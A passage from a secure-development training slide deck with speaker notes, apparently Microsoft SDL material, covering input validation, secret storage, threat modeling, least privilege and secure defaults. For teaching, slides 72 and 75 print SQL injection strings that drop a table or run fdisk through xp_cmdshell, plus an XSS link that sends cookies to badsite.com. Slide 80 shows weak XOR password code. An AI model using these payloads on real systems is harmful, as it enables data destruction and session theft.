  • 72. Really Bad GuyID: 1001‘; drop table orders --SELECT HasShipped FROM detailWHERE ID= '1001‘; drop table orders -- 'Downright Evil GuyID: 1001’; exec xp_cmdshell(‘fdisk.exe’) --SELECT HasShipped FROM detailWHERE ID= ‘1001’; exec xp_cmdshell('fdisk.exe') -- 'Why It’s Wrong(2 of 2)
  • 73. Cross Site ScriptingVery common vulnerabilityThe Nov01 Passport issue was CSSA flaw in a server that leads to compromise in a clientThe fault is simply echoing user input!And trusting user input!
  • 74. CSS In ActionOwns badsite.comWelcome.aspHello,<%= request.querystring(‘name’)%>
  • 75. CSS In Action <a href= http://www.insecuresite.com/welcome.asp?name= <FORM action=http://www.badsite.com/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT>>here</a>
  • 76. Input RemediesAll input is evil until proven otherwiseRequire authenticated connectionsSanitize all inputLook for valid dataReject everything elseHigh-level languages can use RegExpSSN = ^\d{3}-\d{2}-\d{4}$Make no assumptions about the trustworthiness of dataNever directly echo Web-based user inputVerify input, then echo itAt the very least, HTML or URL encode the outputASP.NET adds the ValidateRequest optionUse SQL parameterized queries
  • 77. Storing SecretsStoring secrets securely in software is impossible!…But you can raise the bar!Embedded ‘secrets’ don’t stay secretfor long
  • 78. Storing SecretsDPAPI is the recommended methodCrypt[Un]ProtectDataRequires Windows 2000 and laterPreferable to LSA secretsEasy!You store the encrypted secretYou can back the data upDPAPI provides integrity checkNo need to run as adminAccount that encrypts the data, decrypts the data
  • 79. Storing Secrets in MemoryProcessAcquire dataEncrypt it Decrypt itUse itScrub itFunctionsCrypt[Un]ProtectMemoryRequires Windows Server 2003 and laterRtl[En|De]cryptMemoryNow in PlatformSDKSecureZeroMemory
  • 80. A Related Issue –“Encraption”XOR is not your friend!Don’t roll your ownUse CryptoAPIUse System.Security.CryptographyEvaluate usageAre algorithms appropriate?Document all uses of cryptoconst TCHAR szDecrypt[] = TEXT("susageP");// Decrypt the passworddwSize = (dwSize/sizeof(TCHAR)) - 1;for (dwType = 0; dwType < dwSize; dwType++) { lpRasDialParams->szPassword[dwType] ^= szDecrypt[dwType % 7];
  • 81. The Threat Modeling ProcessCreate an application modelUse UML or DFDCategorize threats by using STRIDECreate a threat treeRank threats by using DREAD
  • 83. KeyThreat (Goal)Sub-threatConditionCreate Threat TreeParse RequestSTRIDESTRIDEThreat (Goal)Threat (Goal)STRIDEThreat (Goal)ThreatThreatThreatDREADConditionSub-threatDREADConditionCondition
  • 84. Rank Threats Using DREADDamage potential Reproducibility Exploitability   Affected users Discoverability 
  • 85. Best PracticesTest SecurityInvolve test teams in projects at the beginningExplicitly test security, not just featuresKnow your enemy and know yourselfWhat techniques and technologies will hackers use?What techniques and technologies can testers use?Use threat modeling to develop security testing strategyAnalyze and prioritize test strategiesAttack!!!!
  • 86. Best PracticesTest SecurityThink Evil. Be Evil. Test Evil.Automate attacks with scripts and low-level programming languagesSubmit a variety of invalid dataDelete or deny access to files or registry entriesTest with an account that is not an administrator accountPerform code reviews
  • 87. Start Right AwayIt’s true that if you have 1000 or more developers, you’ll probably want to eventually work your way up to the Dynamic level of the Optimization Model (where we see ourselves), but the 5-person PHP shop could greatly benefit from implementing the SDL at the Standardized level. At the Standardized level, you perform high-ROI security activities such as validating input and encoding output to defend against cross-site scripting attacks, using stored procedures to defend against SQL injection attacks, and fuzzing your application inputs to find unknown errors. These all sound pretty applicable to a 5-person PHP shop to me!

Editor's Notes

  • #3: So you’ve decided to get serious about security…Photo credits: http://www.flickr.com/photos/declanjewell/2472470758/
  • #4: Maybe you need someheavy securityPhoto credits: http://www.flickr.com/photos/anonymouscollective/2291896028/
  • #5: This elegant system allows more than one person to open the gate, each using their own key.Photo credit:http://www.flickr.com/photos/psd/
  • #6: Overdone security can kill a system.If there is too much impedance, smart users will do their best to get around all the locks Too much security leads to systems that are hard to administer and maintainPhoto credit: http://www.flickr.com/photos/sunshinecity/
  • #7: In this presentation we will complete a high-level overview of the SDL and the important role it fulfills in the design stage of an application’s software development lifecycle. We will also review the secure design principles employed within the SDL that has helped Microsoft better deliver safer and more trusted applications to its customers since the inception of the SDL in 2004.
  • #12: After the requirements for a solution has been identified in the early stages of an application’s software development lifecycle, the next step is to design and architect a solution that satisfies those identified requirements. Developing trusted applications requires that sound security and privacy decisions be made early in the design phase because decisions made at this stage will highly influence subsequent efforts in the latter stages of the software development lifecycle and the final state of the application. Microsoft has found that by adopting this approach, application development costs (such as those required to address and resolve security and privacy issues) are significantly reduced compared to if security and privacy were considered later in the SDLC or not at all. This is because applications developed against more secure and privacy aware designs tend to be exposed to fewer threats and contain less vulnerabilities. Microsoft helps ensure that security and privacy considerations are incorporated into its application design efforts through the SDL by applying the following secure design principles.In the remainder of this presentation, I will briefly review each of these principles and mention how they can be applied to better ensure that application designs consist of sufficient and effective security and privacy best practices.
  • #13: The attack surface of an application is the portion of the program (code and functionality) that is exposed to a particular person or another program. For example, an open network port and a user-interface are examples of an application’s attack surface. One of the most effective secure design principles that can be used to protect an application from malicious acts is attack surface reduction (ASR). The principle of ASR is to minimize the attack surface while still satisfying the functional requirements of the application. Secure coding will reduce, but not eliminate all vulnerabilities in your application; however, by reducing the attack surface, you minimize the number of vulnerabilities that the attacker can discover and attempt to exploit.
  • #14: Here’s an example of attack surface. Let’s pretend we are a home security company and we want to protect this home from a burglar breaking in the home and stealing the valuables inside. What is our attack surface?(Mouse click)At the front of the house we have several windows and doors that a burglar could use or exploit.(Mouse click)At the side of the house we also have a couple windows a burglar could use or exploit.(Mouse click)And then finally, don not forget the chimney!Like this house, our applications have various points that are exposed to people or other programs and computers. Each one of these can be exploited by a malicious, and with attack surface reduction our goal is to minimize the number of potential vulnerabilities a malicious person could exploit.
  • #15: In order to reduce the attack surface of an application, application designers need to first know how to measure the attack surface.The attack surface is defined by the set of interfaces, or entry points, to the program. Attack surface analysis (ASA) is the process of identifying and understanding all of the entry points that comprise the attack surface, and is successfully performed by enumerating all of the interfaces, protocols, and code execution paths. Another important element of ASA is understanding the trust levels required to access each entry point.For each entry point, you must consider the importance of the feature that it enables. For features that are not important to a vast majority of the users, turn the feature off, disable it by default, or do not even install it by default; force the users that really want or need the feature to take explicit action to obtain that feature. This way, any vulnerability related to that specific feature will affect a very small percentage of the product’s user base.Next consider which specific classes of users require that feature, and then restrict its use to those classes. For example, do not default to making the feature remotely accessible, do not default to allowing anonymous access, do not default to running with more privilege than is needed, etc.A significant aspect of ASR is restricting who has access to a particular product feature, and how such users may obtain and use that access.
  • #16: ASA is an iterative process: for each feature that you analyze, you must also analyze all of its sub-features. And again, you want to restrict access to features as much as possible.For example, if your application in general processes files, configure it to read only the most common file types that it accepts; force the user to explicitly configure it to process the less commonly used file types. Also ensure that when the program writes files that it sets the proper ownership and rights on the file; do not create executable files unless those files must be executable.Disable older, faulty, and less used protocols, such as SSL V2 and PCT. Force users to use more robust alternatives, such as SSL V3 and TLS, or force them to explicitly configure applications to accept those older protocols.If your application provides a service or implements a protocol, restrict the commands that it accepts by default to those that are most commonly needed and used. Force the administrator to explicitly configure other commands if they want to accept them.
  • #17: While ASR focuses on restricting access, it is not strictly about disabling or not installing features. For instance, instead of using UDP as a network protocol, use TCP which can be more easily secured. Or instead of making a network service Internet accessible, make it local network accessible only until unless needed.You can also use ASR to enforce the principle of least privilege, which will be discussed later, by designing the program to run with the lowest set of privileges required to perform its function.
  • #18: Here are some examples of how ASR has been applied in the latest versions of Microsoft products that have previously encountered security complications:Authentication before interaction achieves ASR by disallowing anonymous access by default;Firewall on by default closes all but specifically required ports;Many services are now off by default, and when turned on are running as low privileged network services;When services are necessary out-of-the-box, they are restricted to localhost access; andFunctions or features that have been proven to introduce unnecessary and undesirable risk in the past are also now turned off by default.Note: “Network service” refers to the lesser privileged account running the service. Therefore an attacker that defeats the security of IIS 6 obtains relatively few and weak privileges, whereas that attacker defeating the security of IIS 4 or 5 was rewarded with Admin privileges.
  • #19: In addition to the SDL design principle of attack surface reduction, another core principle that needs to be considered when developing trusted software is that of privacy. Privacy, like security, is another key factor when developing trusted applications; however, they are not the same.Privacy focuses on the control and choices users have regarding the use, collection and distribution of their personal information. Security, on the other hand, is applied to protect assets, including personal information, from threats.Again, when designing trusted applications, both privacy and security together need to be evaluated. The SDL helps application designers create more privacy-aware applications by establishing during the design phase privacy best practices, standards, and guidelines.
  • #20: A common myth regarding the relationship between security and privacy is that if a system is sufficiently secure then privacy is also preserved. However, this may not always be the case. A security breach can certainly result in a loss of privacy (for instance, credit card information may be accessed by unauthorized users), but it is also possible for a secure system to cause a loss of privacy without a breach.Consider this secure, but privacy-violating scenario: Securely storing personal information and then sending that information using a securely encrypted communication channel to third parties without properly notifying and receiving consent from the user may be securely implemented but obviously does not take into consideration the rights of the user- some rights may have legal implications! In this scenario, the user’s privacy is compromised due to the inappropriate act of a user / application vs. due to a security breach.
  • #21: In the previous slide I presented the primary privacy objectives associated with developing trusted applications. I mentioned how certain behaviors of an application could create legal obligations that need to be met and how those behaviors could also block the deployment of an application. The table on this slide shows some of the common application behaviors and the legal obligations and blocked deployment scenarios that could arise because of those behaviors. For example, if an application is designed for users under 13 years of age, then legal obligations, such as those described in the Children Online Privacy Protection Act (COPPA), must be met. As another example, if an application transfers personal information, then satisfying legal obligations from the Gramm-Leach-Bliley Act (GLBA) and the Health Insurance Portability and Accountability Act could be required.Application designers need to understand the behavior of the applications and corresponding privacy concerns implied by those behaviors. Microsoft has developed the Microsoft Privacy Guidelines for Developing Products and Services to help application development teams better understand privacy implications associated with application behavior.
  • #22: In order to help application development teams better develop privacy-compliant products and services, Microsoft has released the Microsoft Privacy Guidelines for Developing Products and Services. This document provides common definitions and rules for developing better privacy-compliant products and services. The document is divided into two sections: The first section contains definitions and key concepts including data types, notice, consent, etc. The second section contains rules categorized by specific development scenarios, such as collection and transfer of personally identifiable information (pii), storage of data on the customer’s system, and onward transfer of pii to third parties. There are also specific scenarios for products or services that collect age or are attractive to children, and for products that are deployed in enterprises. Products deployed in enterprises are a special case, because the developers’ obligation transitions from the user to the enterprise administrator—you need to enable to enterprise administrator to fulfill their company’s privacy policies.At Microsoft, our goal is that our customers will be empowered to control the collection, use and distribution of their personal information through our products and services, and so any externally released application or Web site must comply with the clearly defined rules and guidelines set forth in the Microsoft Privacy Guidelines for Developing Products and Services. Within the SDL, a privacy bug bar is defined and is used to measure the impact of non-compliance with the rules of the Microsoft Privacy Guidelines for Developing Products and Services. Downloading the Microsoft Privacy GuidelinesThe current version (version 2.1a released 04/26/2007) of the Microsoft Privacy Guidelines for Developing Product and Services can be downloaded from:http://www.microsoft.com/downloads/details.aspx?FamilyId=C48CF80F-6E87-48F5-83EC-A18D1AD2FC1F&displaylang=en.A link to the most current version of this document can be found under the privacy section of the SDL training and resources link, located at: http://msdn.microsoft.com/en-us/security/cc448120.aspx.
  • #23: In this section of the presentation, I will briefly explain the process called threat modeling, which Microsoft uses through the SDL process to understand and address any and all threats to an application. It is important not to confuse threats with vulnerabilities. A threat is simply what an adversary might try to do to compromise a protected resource in the system. A vulnerability is a specific way that a threat is exploitable based on an unmitigated attack path.A person in an application design group with security expertise typically leads the threat modeling activities, which begin with identification of all potential threats to the system and the assets accessed by the system. Threat models must be revisited periodically to account for new threats resulting from new and evolving attack techniques.Please recall that this portion of the presentation is meant only to provide you with a brief introduction to the threat modeling process.
  • #24: At a high level, threat modeling consists of a number of activities conducted during the design phase of the application development process. These activities begin by envisioning the application as it will be used by typical users in a typical environment, and continue by identifying all of the potential threats to the application and to assets accessed via the application. During this process all security-related assumptions and external dependencies are documented, as are the “external security notes” – notes to help users and administrators understand the security boundaries of the application currently being developed.The threat modeling process continues by creating a number of data flow diagrams (DFDs), which model the trust boundaries of the application and its components and the flow of data between the application and its environment, as well as the flow of data between components within the application. Now that you have a completed model, the next step in the threat modeling process is to determine the types of threats facing the application (from the malicious user’s perspective) and list all of the DFD elements. The DFD elements represent the application assets that need to be protected from attack.Knowing what needs to be protected, and how they will be attacked, enables you to choose appropriate mitigations for each threat. Note that we are still in the design stage of application development! We are now designing security controls into the product based upon the most likely threats; the most cost-effective juncture to address such considerations.At this point, we need to review the threat model, the DFD elements (a.k.a. ‘assets’) that need protection, and the mitigations or defenses/countermeasures, to ensure that the mitigations do indeed protect the assets from the threats. If anything is found to be amiss, this is the time to start from the beginning of the threat-modeling process once again.
  • #25: Microsoft has published the threat modeling tool it uses internally to help automate aspects of the threat modeling process. The tool is available for download at http://www.microsoft.com/downloads/details.aspx?FamilyID=62830f95-0e61-4f87-88a6-e7c663444ac1&displaylang=en.
  • #26: In addition to attack surface reduction, privacy and threat modeling, another key design principle that should be leveraged to create trusted applications is the principle of defense in depth. A key perspective of defense in depth is beginning the application design process with the mindset that all applications and hardware will ultimately fail. If you go back to the burglar breaking into a house scenario, all the doors and windows to the house could be locked to keep the burglar out. Those might fail, so an alarm system could also be installed. The alarm system might fail, so the valuables inside the house could be placed inside a safe and so on. In the context of designing and developing trusted applications, this means that privacy  (e.g., cryptographic algorithms used to protect sensitive or personal data) and security (e.g., firewalls) features or mechanisms defending our applications will inevitably fail. Unfortunately most applications today are designed and implemented in such a way that the application can be compromised when a single, and often only, layer of defense fails or is breached.With the defense in depth principle, applications are built in such a way that if one defense layer fails, there are additional layers of defense that can provide protection to the application. Think about it this way, if a malicious user is going to compromise our application then we should make their job as difficult as possible by implementing multiple layers of defense that they need to breach vs. just one. That is defense in depth! 
  • #27: The easiest way application designers can get started with this powerful principle is to evaluate their application designs and ask themselves if one layer of defense is breached, what other layers can provide additional protection to the application and the assets that it is protecting.Here is an example of defense in depth and how this principle can be leveraged to make trusted applications more difficult to compromise. Consider a malicious user who wants to gain unauthorized access to sensitive data stored in a server, such as credit numbers or other personally identifiable information (PII).(Mouse click)Again most applications today are designed and developed with a single layer of defense in mind – typically a firewall.(Mouse click)If a malicious user is able to breach this single layer of defense, then that user is able to compromise the application. (Mouse click) On the other hand, an application designed with the defense in depth principle has multiple layers of defense protecting it. For instance, defense layers like input validation (application-level), smart card (host-level) access, and IP security (network-level) are examples of additional layers of defense that could protect an application.(Mouse click)So now, even if one layer of defense fails, there are additional layers of defense that can provide protection to the application and the attack is halted. In our example, while both the firewall and the second defense layer failed, the 3rd and 4th layers of defense were still able to halt the attack, thereby protecting the sensitive data.
  • #29: The previous SDL secure design principle of defense in depth started with the notion that all software and hardware would fail at some point. With the least privilege principle, we assume that all applications will be compromised. However, thru employing the principle of least privilege, should a malicious user compromise an application the amount of damage that may be inflicted is limited.
  • #30: Pretend that we have a malicious user and an application running on a system that the user is hoping to compromise.(Mouse click)In this example, the application is running in an administrative or local system state. That is, the application has the same rights as any administrative user on the system.(Mouse click)When our malicious user here compromises the application, because that application is running in an administrative state, the malicious user can now use the application to perform malicious actions, such as changing system passwords, reading users’ files, and accessing any data on that system. In fact, because the malicious user is essentially an administrator on that system through the compromised application, the user can do whatever is desired.(Mouse click)Now see what happens when a malicious user compromises the same application, but this time the application is running using the least privilege principle. That is, it is running in a lower privileged state, such as a network service.(Mouse click)Now when the malicious user compromises the application, the malicious user cannot perform malicious actions, such as changing system passwords, reading user files, etc., because the application that the malicious user is using to perform those nefarious actions does not have the privileges (i.e., access) to do so. In applying the least privilege principle, we have greatly limited the potential damage a malicious user can apply to a compromised system. It is still not an ideal situation; we would rather the malicious user not be able to compromise the application at all, but if the malicious user does compromise the application, then at least we can limit the amount of damage that may be inflicted.
  • #31: Here are a few tips when using least privilege to design applications that are to be more resilient to malicious attack.Think minimally. Ask yourself, what is the minimum access your application needs to function correctly?If your application requires higher privileges, elevate those privileges only when required and release those privileges immediately after the purposes of those privileges have been satisfied.
  • #32: In the previous section I provided an overview of the principle of least privilege. In this section, I will present another important and last principle known as, “secure defaults.” Recall that with the attack surface reduction principle, any non-critical part of an application that was exposed to a human or system was removed or disabled by default to reduce the number of exposed vulnerabilities a malicious user could use to compromise an application. The secure defaults principle considers the situation where part of an application needs to be exposed to a human or system by default and how this may be conducted more safely and securely. Microsoft, through the SDL process, has used this principle to better ensure that customers have safer experiences with our applications out-of-the-box, rather than after extensive and often manual configuration activities must be performed. With this principle, it is left to the user to reduce the security and privacy of an application, and not left to Microsoft / the manufacturer of the software.Malicious users commonly scan networks for applications or devices that are known to be insecure by default, such as wireless routers and web servers. These applications are easy to compromise. With secure defaults, this ability is taken away from malicious users and helps keeps your customers safer.
  • #33: Regarding the secure defaults principle, designers need to evaluate the various parts of their application from the perspective of what is the most secure or privacy-aware manner in which this part may be configured. Here are some examples:Firewall. Microsoft Windows can be configured with the firewall on or off. By default, the latest and future versions of Windows come with the firewall turned on by default.SSL Socket. If your application can read data through an SSL socket, then by default it should be configured to use only the latest secure protocol versions, such as v3, TLS, etc., and avoid insecure versions, such as v2.User Access Over Anonymous or Authenticated Channels. If your application has the option of allowing users to access it over anonymous or authenticated channels, then by default it should use authenticated.Password Complexity. If your application can require users to have complex passwords, then that feature should be enabled by default.Storing User Passwords as Hashes. If your application can store user passwords as hashes or clear text, then it should store passwords as hashes by default.
  • #36: This concludes our discussion on the SDL Secure Design Principles. In this presentation we completed a high-level overview of the SDL and the important role it fulfills in the design stage of an application’s software development lifecycle. We noted that when security and privacy considerations are sufficiently and effectively incorporated early into an application’s software development lifecycle, such as in the design phase, the overall number of threats an application is exposed to and the number of vulnerabilities an application may contains will be substantially reduced. Additionally, the overall cost of maintaining trusted applications will be reduced due to the number of remediation efforts required to address post-deployment security and privacy issues will most likely be reduced.Finally, we explored the core secure design principles leveraged by the SDL, which are:Attack Surface Reduction. This principle emphasizes the importance of reducing the overall number of possible points in an application that malicious users can use to attack that application.Basic Privacy. This principle concentrates on the importance of fulfilling certain legal obligations, increasing customer trust and unblocking deployments based on an application’s behavior.Threat Modeling. This technique gives application designers a structured and methodical way of understanding and analyzing threats to an application.Defense in Depth. This principle focuses on how the use of multiple layers of defense for an application greatly reduces the likelihood that a malicious user will be able to exploit it.Least Privilege. This principle emphasizes the importance of limiting the amount of damage a malicious user can inflict in the event an application is compromised.Secure Defaults. Finally, this principle concentrates on better ensuring customers’ safe experiences with an application out-of-the-box rather than being required to perform an extensive series of custom configurations.
  • #39: This diagram compares the security engineering steps of the SDL to the software engineering steps of the classic SDLC (software development lifecycle). The blue outer ring represents traditional software development and the orange inner circle represents the SDL. Notice that the security engineering steps are incorporated into the existing software engineering steps and that any engineering task can be supplemented with a security engineering task.Both of these development lifecycles, or collections of engineering steps, apply to the software development lifecycle regardless of the particular development model you use (for example waterfall, Agile, etc.) The small pewter colored circles represent the various milestones in your model and are an excellent time for ensuring that the steps in both the security and software development lifecycles have been adequately addressed.The SDL process has been documented and published in The Security Development Lifecycle book (Microsoft Press 2006, ISBN: 9780735622142), and the official Web site can be accessed at http://www.microsoft.com/sdl.
  • #40: This slide provides additional information and links if you would like to learn more about Microsoft’s threat modeling process.
  • #41: Microsoft also has a security developer center located at http://msdn.microsoft.com/security where developers can find a wealth of resources, including guidance and tools, to help them build safer applications using Microsoft technologies and platforms.
  • #42: Visit the SDL Blog to get the most current ideas and thoughts from Microsoft SDL team members.Visit Michael Howard’s Blog to read all about how security can be effectively incorporated into the software development process from the author of the popular book, Writing Secure Code (Howard, Michael and David LeBlanc, Microsoft Press, Redmond, Washington, 2003).
  • #45: This section provides additional slides, materials and information to supplement the main contents of the presentation.